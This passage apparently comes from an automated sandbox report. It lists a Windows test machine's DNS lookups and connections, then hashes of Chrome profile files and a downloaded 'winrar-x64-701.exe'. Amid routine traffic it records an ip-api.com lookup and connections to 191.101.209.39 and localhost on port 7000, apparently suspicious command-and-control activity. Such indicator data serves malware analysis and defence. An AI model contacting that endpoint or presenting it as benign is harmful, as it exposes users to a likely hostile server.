| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | www.corel.com | udp |
| NL | 23.194.209.160:443 | www.corel.com | tcp |
| US | 104.19.178.52:443 | cdn.cookielaw.org | tcp |
| US | 8.8.8.8:53 | 52.178.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.42.23.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.246.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | geolocation.onetrust.com | udp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 104.18.32.137:443 | geolocation.onetrust.com | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 8.8.8.8:53 | download.winzip.com | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| NL | 23.62.61.176:443 | download.winzip.com | tcp |
| NL | 23.62.61.176:443 | download.winzip.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 119.190.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.32.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.installportal.com | udp |
| US | 44.235.254.98:443 | www.installportal.com | tcp |
| US | 8.8.8.8:53 | 98.254.235.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.234.34.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.sf.dl.delivery.mp.microsoft.com | udp |
| US | 2.17.251.15:443 | msedge.sf.dl.delivery.mp.microsoft.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 15.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| US | 13.67.191.143:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 9.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.191.67.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.f.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 199.232.210.172:80 | msedge.f.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| GB | 172.217.169.67:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | privacyportal.onetrust.com | udp |
| US | 104.18.32.137:443 | privacyportal.onetrust.com | tcp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | beacons4.gvt2.com | udp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | tcp |
| US | 216.239.32.116:443 | beacons4.gvt2.com | udp |
| US | 8.8.8.8:53 | 116.32.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | x.clarity.ms | udp |
| US | 20.114.190.119:443 | x.clarity.ms | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 163.214.58.216.in-addr.arpa | udp |
| FR | 142.250.179.97:443 | tpc.googlesyndication.com | udp |
| US | 8.8.8.8:53 | www.winzip.com | udp |
| US | 8.8.8.8:53 | download.winzip.com | udp |
| NL | 23.62.61.144:443 | download.winzip.com | tcp |
| US | 8.8.8.8:53 | 144.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www-ezyzip-com.webpkgcache.com | udp |
| FR | 216.58.214.161:443 | www-ezyzip-com.webpkgcache.com | tcp |
| FR | 216.58.214.161:443 | www-ezyzip-com.webpkgcache.com | udp |
| US | 8.8.8.8:53 | 161.214.58.216.in-addr.arpa | udp |
| FR | 172.217.20.174:443 | play.google.com | udp |
| US | 172.67.159.133:443 | extract.me | tcp |
| US | 172.67.159.133:443 | extract.me | tcp |
| US | 8.8.8.8:53 | id.123apps.com | udp |
| US | 8.8.8.8:53 | s88.extract.me | udp |
| US | 172.67.159.133:443 | extract.me | udp |
| US | 8.8.8.8:53 | connect.facebook.net | udp |
| US | 104.26.14.12:443 | id.123apps.com | tcp |
| DE | 162.55.69.232:443 | s88.extract.me | tcp |
| US | 8.8.8.8:53 | apis.google.com | udp |
| GB | 163.70.151.21:443 | connect.facebook.net | tcp |
| GB | 142.250.200.14:443 | apis.google.com | udp |
| US | 8.8.8.8:53 | 133.159.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.14.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.69.55.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.151.70.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | content-autofill.googleapis.com | udp |
| FR | 142.250.178.138:443 | content-autofill.googleapis.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| BE | 108.177.15.155:443 | stats.g.doubleclick.net | tcp |
| US | 104.26.14.12:443 | id.123apps.com | tcp |
| US | 8.8.8.8:53 | 138.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.15.177.108.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| FR | 216.58.215.35:443 | beacons.gcp.gvt2.com | udp |
| US | 8.8.8.8:53 | 35.215.58.216.in-addr.arpa | udp |
| US | 172.67.159.133:443 | extract.me | udp |
| DE | 162.55.69.232:443 | s88.extract.me | tcp |
| US | 8.8.8.8:53 | e2c54.gcp.gvt2.com | udp |
| US | 35.219.153.27:443 | e2c54.gcp.gvt2.com | tcp |
| US | 8.8.8.8:53 | 27.153.219.35.in-addr.arpa | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | www.example.com | udp |
| US | 93.184.215.14:80 | www.example.com | tcp |
| US | 8.8.8.8:53 | 14.215.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| US | 20.114.58.89:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 89.58.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 2.17.251.17:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | 17.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 93.184.215.14:80 | www.example.com | tcp |
| US | 8.8.8.8:53 | msedge.api.cdp.microsoft.com | udp |
| US | 13.67.191.143:443 | msedge.api.cdp.microsoft.com | tcp |
| US | 2.17.251.17:80 | msedge.b.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 8.8.8.8:53 | msedge.b.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 191.101.209.39:7000 | tcp | |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | 159.113.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.office.com | udp |
| US | 13.107.6.156:443 | www.office.com | tcp |
| US | 8.8.8.8:53 | res.cdn.office.net | udp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| DE | 2.16.6.6:443 | res.cdn.office.net | tcp |
| US | 8.8.8.8:53 | nav.smartscreen.microsoft.com | udp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| GB | 51.140.244.186:443 | nav.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.6.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.6.16.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.244.140.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | data-edge.smartscreen.microsoft.com | udp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| GB | 172.165.61.93:443 | data-edge.smartscreen.microsoft.com | tcp |
| US | 8.8.8.8:53 | 93.61.165.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 52.182.143.211:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 46.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp |
Files
\??\pipe\crashpad_3396_XIFGALHCKRFUQTSO
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | d336dabb89cd920f027499861bb42da1 |
| SHA1 | 95cef1060a4ad2e3bc3f274c20b0e7168552ed4a |
| SHA256 | 91d5342b13de1fd142000e072f5923721f8067a62362f75aa7897ff5de16df63 |
| SHA512 | 33ef02a1e1ab3f55a4d5ae55bd75edbac3a66b9a1ae72acd2acddbf9987b9d3cb5044fe186e43d8dd7136223a070a2afb64d76a8391f292786c29298c127d8f9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | a9ea09330b1dd535fd20726bc4e62a49 |
| SHA1 | 3c777961662458489aeb15f8ce8bef1829b427c4 |
| SHA256 | e751d4f9a294baba30ef5521b86613fb5fdd0aa714e188ed3cd2e845f96285e8 |
| SHA512 | 91493d1c5cada191e0fc15cbaff797ba41789359a38f78412d3400594d0d6691adb9ea4b370e86faad1ac981cbb88f8e5d555937afbc3edf8d4f68a50f4ed8ae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | a25372b52cce820bc9d885978b63908b |
| SHA1 | 12b9ec50cb72fc0939a7587b0d46fdb2e9ac6d9a |
| SHA256 | 3887865553c46bb528e1747d9d714b76d4014c61885b12858010318963ab96e1 |
| SHA512 | f19c10976403dd61cc78c5080b22182fdea6a0ddd38c7f597a520e136e404bb676910717910e63c20958089ac15275fb071a429306178d9d030341a0e731b028 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 39f89a2efeae95c237d8c46874913778 |
| SHA1 | 7fd1fb8a3d40528a38a5f42ea941f66c2dcdb7ba |
| SHA256 | 8131967615046e1b5fa9c430adfe8d8a47348e05a05b8c4675f40ed11b748361 |
| SHA512 | e89e3dbc4feb395f55b1046b93f104f358a8c581643f27a56063bec9160215c8491a54f4d2a39ce14fba946dc9a9db79b06ab3f47d2fb4b10eb364a4313f87fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 99c286b30e27855c64894926f333ec31 |
| SHA1 | 354707b60526faa9f70183c0c38af3e09fb2de45 |
| SHA256 | 3b7bd40f0fd384dfbd5080db07b59f4fa22ac911a63163085b36951dcc838c65 |
| SHA512 | 58af827cebe7b1d08db9960e76f58da72a60032176bce48640083735dece9baae45c789e52083a2158635651a0408e844d0cb9af06806e1d5bdef6255d66d7b7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | c3f055ea5f9047f77ca889ab68d71103 |
| SHA1 | d48b5f424790b695e39e6c38bdf5b27e5b646800 |
| SHA256 | 170aa2933434434a7ae3ae117c46e17e35d1095f9e6ee9ecc02000550da639d1 |
| SHA512 | fd2e0d51460e1c229290b0d77d90ee8bcab4966a9d0c9fe2b288d403462a64ea20050a6e17023a0c72b2f3a0a23e0b260958f97dd6e13cf86ed2aa239280f11a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7bab9426668ee055946cdedf8d679799 |
| SHA1 | 08116e9250fc3383c6ed1e095a5aa3bf73b6e491 |
| SHA256 | 33f33fcd16bbe23a62e73a0b026cfd3141e53855d9e5f51a4333ffbad4473711 |
| SHA512 | 026ce48ccecb49a85e3aa53d528ddbf5f23a57f82ebdd369026607a73ebc318522b4de3be44592329d390d2baf7c0c9c4efb2ed1974ad9baf3eb5d238eb7f61c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 1277e567382990a225b89c20c3b6037e |
| SHA1 | 4d922768974bc3891869e220ef941b25e475a2a4 |
| SHA256 | fd4550b2dc5fb093386bd14ac99d234e3c1cdb0819dabb4591431bf906d38f5c |
| SHA512 | eed8b6be9c6110a997cb402c8b0d5c1aee660001fa4a098f539f5a35ecaedc8ac0d8aa8fbb38e69e1703a3ebfddd5794c920dd45bf52b9a2e834de1581bbda0b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1dac2eee1f9d96d675f472ee6ebf433a |
| SHA1 | 9bcf0ab93d1977a7e65bb72500fa79e2e1acd9ee |
| SHA256 | d8bf09794a85f651444e75efac0aee8167dd1e6b824894f08d4cc99d83d1d81b |
| SHA512 | c0249b36d95ebebc7a9d4e212b0c50848a5729dc41657a4cff7ebba3ccb1037ac2c5d060c80dce9593d13e8350b714e8becfd6fe64ad8a4a45d746abae643fff |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3c025372b11380eb9f74b92b3cf44a9f |
| SHA1 | 276bd5c212f1b15cd374544f38ff71a90c817b27 |
| SHA256 | e96d5121b0c4c3bc3cfbee012c23a4c6b366ad54bfad426427b3156650351617 |
| SHA512 | 7613a3dfb5ce0b5250c5bcfa2b4a41ee155a91697abe01d4b8e56f1be35668d3a9edd1acc4c044070194d65bfed9fdb34419a78ec5dd09337175b8fc2de4d5a7 |
C:\Users\Admin\Downloads\winrar-x64-701.exe
| MD5 | 46c17c999744470b689331f41eab7df1 |
| SHA1 | b8a63127df6a87d333061c622220d6d70ed80f7c |
| SHA256 | c5b5def1c8882b702b6b25cbd94461c737bc151366d2d9eba5006c04886bfc9a |
| SHA512 | 4b02a3e85b699f62df1b4fe752c4dee08cfabc9b8bb316bc39b854bd5187fc602943a95788ec680c7d3dc2c26ad882e69c0740294bd6cb3b32cdcd165a9441b6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 91935c396418ad60af6cd22afba4856e |
| SHA1 | 6fd69910f5b2ca094887b17d373b5d23d1177a45 |
| SHA256 | 161a83269d13e07d0bcacd88599d8c9153e858e1c1730b8797d7e77a2b47d299 |
| SHA512 | 8caee784ac4955a77567eb4b276b37fc2d741912d5980d15c5e90fb170b842c4172610917d7a96b936fdb24d5f2a7c69583616cc1ac710719bb87c11dab9e8cb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe584978.TMP
| MD5 | 42a5ca948ca9a86c6b47635bff8be20d |
| SHA1 | 5d4579ce0be0e1049981afb6c298f2c79540a83f |
| SHA256 | fb3056b0af7667ac864fe1da3d7285b9235f8d1ae3e4c8ab0329f11dcebd98cb |
| SHA512 | a38ed2056c59dbb007b4f10c6cd14d61310495ac64c76b60275f9b94758deaaee631facc6e99bcc059f65c2c2a8a3e51c3fc335c9a78545c81ec9a7ade350137 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 9c06f572f2fd35e78524871acd864762 |
| SHA1 | aa55540b20f0c35d9be8b59a917b17d6989378e4 |
| SHA256 | ff9667497fd5f02510feb2152dfab7d32965d8ccbf080c4647c37c35e1ce3e3e |
| SHA512 | d60816c48a521b64dd3543d8c903fb92cc1f26454bd44926785d532b21b8905d79377db97a80feeaaf89ad149f7eef783a45b662a024ddce04e7920afe6a4f36 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 396e59a306b875643c2c03e65bc846ee |
| SHA1 | 7977fe7abc227053c58f28a43878bfc4b4bc0fbd |
| SHA256 | 103b38a9a929b55905a43f8b2ac470ee2a4316a4140cc31058fa6bb5a1666a0c |
| SHA512 | 8bda6f27efcc4df3b2c537a1e3c7b5d17f4f135de06e7035dc6f6ed6f13a065fde9f3ec4b4ae3770e8ad24c14e03a8e178fa55fc85dee1e98221b8a0989bf1f8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | 73cc52bafcdf835483e6935827ea0231 |
| SHA1 | 60390e7a8c83309549a0099922d8b14488d4fdea |
| SHA256 | 13023558ef288c7742d8f264c6ddabdf61661364360a31ea0684ebb77cfcfc6c |
| SHA512 | 7c142624646ca78deeadf08266989bf72158be5b5d192d2f79c14adea0d6c4f8b1e6cd7fde0598dbef1f3742a703e53fa5b022d6831bab9f9d46402ffa036669 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 956467a2ad0716fc35bb8b97de5dc5be |
| SHA1 | 38b1c12945aa1f4ff6480a9f26cf14f8fb8429c4 |
| SHA256 | 179e13cbfb836a9a2ceda7cd4569ddac574b1a750b8a7665313222df83b74ca2 |
| SHA512 | 43264d4d52168764f3c3794d020f5d00e8fcfc95de94e8934d276017fdbfdd2489842f12f0c2ba065941f0b5083e1b79dc1b10e2f7344aef6a85fb3b9ea5fecf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 33e1cea5357e5f2e73a4c9637358e1a8 |
| SHA1 | 03ddf6ce4408a8741a4206692e129be304f7b222 |
| SHA256 | 3692b2001935fb72def791461a6112156969cee3c7aadc9e90189f15d3f25d84 |
| SHA512 | b516cdeec6ccab535df69e512fee365f2e627dc80520b1c5f47f88ad2c9a7eba0b70fd96e876f4c23c93f8d88600e8741a3595f50b5590ad3336783a3341451c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | ffee43a916b71721539b99b3474d1c37 |
| SHA1 | 242cd4d51672addf54a322067ce89de8205de791 |
| SHA256 | ff3571cecd68c2eacd7148b861394ec84514b23c1545562f453aa235abfeee27 |
| SHA512 | 77b919516bf5b38e6d05bf6c9a2bcfc2e51f34fe3950490b8cf7fb50847662c0dafef3eebdbc9e674533524100eb6b0c8d1c6f522cd2bed5b7965b6b7bb26d0e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 143bda510839fe06be4627096d1ca3d1 |
| SHA1 | 045c6e563dc68d1e6f3bf505fdcd485fc01cd4a6 |
| SHA256 | a15d437d1ce49af7482753d1af034528ecd2f560576a3ff047a2a0743be4fc44 |
| SHA512 | 7e01139757a17177c390626f562e2e3a26baa3e23cbd1b207ed2e302740177b7d9358d5e81bb79e51eb63b8ea247a98adc32cd22f8678c57f3cf42c35d8acf3c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1
| MD5 | 0352026853f14e80ff8ec92dfb4ba97f |
| SHA1 | 13f4d0281393b5cccc85435f482f472a0cfc7241 |
| SHA256 | 7527503d4ad7b388d8a786630d02e3b433efe5a07c592d15143b3c96b06eb9d3 |
| SHA512 | 6186eef812dd6d0f23435799156c6f2aa0bf8216b1ce6b947ad5672c5ee5210947ffcb9789bd4202ed9264324dfac4546dd946feeca32ff2f80bbdb4950a8474 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 6123155f7b8a202460ac1407e231fbf4 |
| SHA1 | 13121f6000a380f6621bcb8dc7c83f9cd10ab626 |
| SHA256 | dc3766fd1d9f14e305d5483a9e886548c3ff3ad2d8497e26a04c6d8c31e7be6c |
| SHA512 | ef2e48a3517f58cf068d2ed9e202ba4d2a54afdccd4937c74b5c84d5c4fd47d9b92ddcf3b842a102b426dccae53ab3bc9e571a5cf27cb315be4dc58bdaad34cf |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Variations
| MD5 | 961e3604f228b0d10541ebf921500c86 |
| SHA1 | 6e00570d9f78d9cfebe67d4da5efe546543949a7 |
| SHA256 | f7b24f2eb3d5eb0550527490395d2f61c3d2fe74bb9cb345197dad81b58b5fed |
| SHA512 | 535f930afd2ef50282715c7e48859cc2d7b354ff4e6c156b94d5a2815f589b33189ffedfcaf4456525283e993087f9f560d84cfcf497d189ab8101510a09c472 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\data_1
| MD5 | 30d575d034da5316637a6a9d7f287881 |
| SHA1 | bd673970f340ed6aef389b272af2109e657e339e |
| SHA256 | 51fca9d8a87581e096962b7a8af3eab8554a3ad59b69b9d4106b1b2f2e7dd31d |
| SHA512 | 36b219c6b367e72111a95f22b420be488ccc387d6fb1891f7bc21040ad144d5d9a9a39baa2eb2e02d90e229f6fb0fb8766af6644111644faf986606d168b063e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version
| MD5 | 009b9a2ee7afbf6dd0b9617fc8f8ecba |
| SHA1 | c97ed0652e731fc412e3b7bdfca2994b7cc206a7 |
| SHA256 | de607a2c68f52e15a104ead9ecbaa3e6862fdb11eac080e408ba4d69f1f7a915 |
| SHA512 | 6161dd952ae140a8fb8aa5e33f06bc65fdc15ce3fbfe4c576dc2668c86bce4a1d5c1112caee014e5efa3698547faad3bc80ec253eedb43148e36e1a02ce89910 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000003.log
| MD5 | 9ed7b52a122713d529a21388c6d5b154 |
| SHA1 | b687eb9a49aee70324ab856db8368372b396e43e |
| SHA256 | 92e517780fb94bb5d6fadb8c2bb953e632757b7dc5695bdb89e01b7f15df3e30 |
| SHA512 | 88b3b1d550e966257ad8074ac66e1d82471f65eae5b2abbaef9317395db9bf6ad17d4cb046a4c904bec205dead7b11bf85c58d8ef32a837d0b32f5aa107dd21a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\LOG
| MD5 | 82a23cf26c187ff5caa489f91b51a820 |
| SHA1 | d6bfb53675b9d199c83efd54eb970d7a4f429d18 |
| SHA256 | f9c80e6629152b347b7ecffa6d2820a3616f716207c849f93e2738257bc7c468 |
| SHA512 | 92dff05b3685d5b0192700f26794be2fcdae720dbfc2f1613221c50a30654f69311337615de929c971fdb1be344f190d6fb3474abe0813731c40a8101be45189 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
| MD5 | 3e013dd74eaff0ebb0b93fd8b47ecd03 |
| SHA1 | 67e68dc68b6dd1c7d32b1c81842c3d58a13964a1 |
| SHA256 | fc125ab9d68ff38b6ebf6b4c75f1e254ad6877b48d757722288f96b87fe43622 |
| SHA512 | 7b60ff077fdf28c519de6059522c2f7b547e74476f2b855c6f09564147459587e86a050dd4353a079e99c71f701bf4313ed1efa4d93c2af389139c57bae4df36 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a
| MD5 | 716def4f220e4575d47d3195cfffb4df |
| SHA1 | 5d1baf7f02a6474c57547bcec10bb2464635fb3e |
| SHA256 | 362703e0c520d561815562c2245696dc0703cc4c86605e44144b0ec23ecb0608 |
| SHA512 | 9e75e6c142534d0036f42e6d0ebc5cf8e0818a91d756c4e3772f81b33a27e8ccc9471afd91cfaf6376289671d2620a1339b04c6481a4f7224941fe6a91fbfb97 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019
| MD5 | 67a34eb1a1b30104bf635af340baeedf |
| SHA1 | 335441d78e23c6f09ad09c6c8a1b6743c4aa0ad6 |
| SHA256 | 2c532b9d23df140e991c5a1161ae1a2425a67e0fd477688f2547f3dd3d3c5ffb |
| SHA512 | 5fcef2b7ad62f83a236f0265e4499070033178812914a11ab2de255f7d07355d5b3b1b2533cfeaa9227beb72d43d9990ec21c8c603607353a87cf7735c112fae |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018
| MD5 | 58a7b97bfcefb8ea07c7dc41a300a6b6 |
| SHA1 | 9f278bf2e8a03ed41abbe02167412966f3691330 |
| SHA256 | 5900dfd35abc2f2fcfede936b15bedf3555de62266c5338610af77adffd08ad4 |
| SHA512 | 73232cc92c878ec123c6944dd1c42bf0b55c6b4a12ba7d8beb880be2a912c108220deb510dc9d04808f23dabdda0b8ae4dee9a6f68a8189eaa76a0057b0aa0ad |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000017
| MD5 | e2ae686074cea3fe2c55834624e04cd5 |
| SHA1 | b8d6723542e00abf40576ec72b7925f6130635e5 |
| SHA256 | 26b1cb6b230fa0ef64b55ca2e7a82a5515fb053c6610b5afb68b8be8efe62885 |
| SHA512 | 99d8748bd1d131a17df9113c9e28109289a1da81c23abe00d6c7edb0f5545acefcdad93e82d622b079415d126bffce9547ac4141aa4ec4cbb6d8ce70f3b7b552 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016
| MD5 | 71d6bd59dadaaab4280e49c5eb467516 |
| SHA1 | 1566f747232c20eef5dda926f319185757af10f9 |
| SHA256 | de9e0fbc1d789b4f07e5ca339ee2713ebc385b0d324fee24a90fec8cdb45f909 |
| SHA512 | fea1c3f49339211afd615c13a7796ce43650c19c1cb0de276c489d1f98ec3241f0c4a1dab12538d6ea1576d6f139d7e34d89c696913ad88f2e1e10962470a88c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015
| MD5 | 903bd6b58360c11cf14f06b9284c7987 |
| SHA1 | c6e130039b1897bf1fef130f58632e3d8ad8956b |
| SHA256 | a3863efc6a5f6b5e63cfc30bdf0679f36ae9aff0b90fac133f6ea529ae06ec88 |
| SHA512 | 9569bbabeb7e1ae34afc507e5a9259515146fae45197573b022d82bc47f396f9a364f1c404784f54291c92a1d8d9997831252e785e2363f9edad1b7c878b2681 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014
| MD5 | d3caac4fcaf4a1301b1e7545c7cfe89b |
| SHA1 | 63ecd0bef1196464ad866b38f5779effcf1fdb87 |
| SHA256 | 97f05c53dcc95a6950acd926bb48e1362dcbdbfe0d3795e91b3a7b46d71f0d1e |
| SHA512 | 7c4b37ecc38b100028d272e20f945143e8b523ede45ffb8f05e5cc03b6b9590e7d6d1ce308fb050e688d0e9d7537a5eb8c96a3dda6240c2fd783b497f845511f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000013
| MD5 | 60d33c32ce7ed08303cf9eacb22ac646 |
| SHA1 | 2abc8aa7fc62e82e9a9aa40d052f2ba29f217520 |
| SHA256 | 36a413b120479a8319a660dcd7e3d724fc07f01c02e09a84820cd7eeab5237a3 |
| SHA512 | a5009b4f1de5d55042415b4c66b91d14f0dc38fe5d2ed084109713d0ce56e8e240a62141bcf5b0361e081f717c2895dea1742bc493f40385edd9211f8dbaa2f6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012
| MD5 | 888c5fa4504182a0224b264a1fda0e73 |
| SHA1 | 65f058a7dead59a8063362241865526eb0148f16 |
| SHA256 | 7d757e510b1f0c4d44fd98cc0121da8ca4f44793f8583debdef300fb1dbd3715 |
| SHA512 | 1c165b9cf4687ff94a73f53624f00da24c5452a32c72f8f75257a7501bd450bff1becdc959c9c7536059e93eb87f2c022e313f145a41175e0b8663274ae6cc36 |
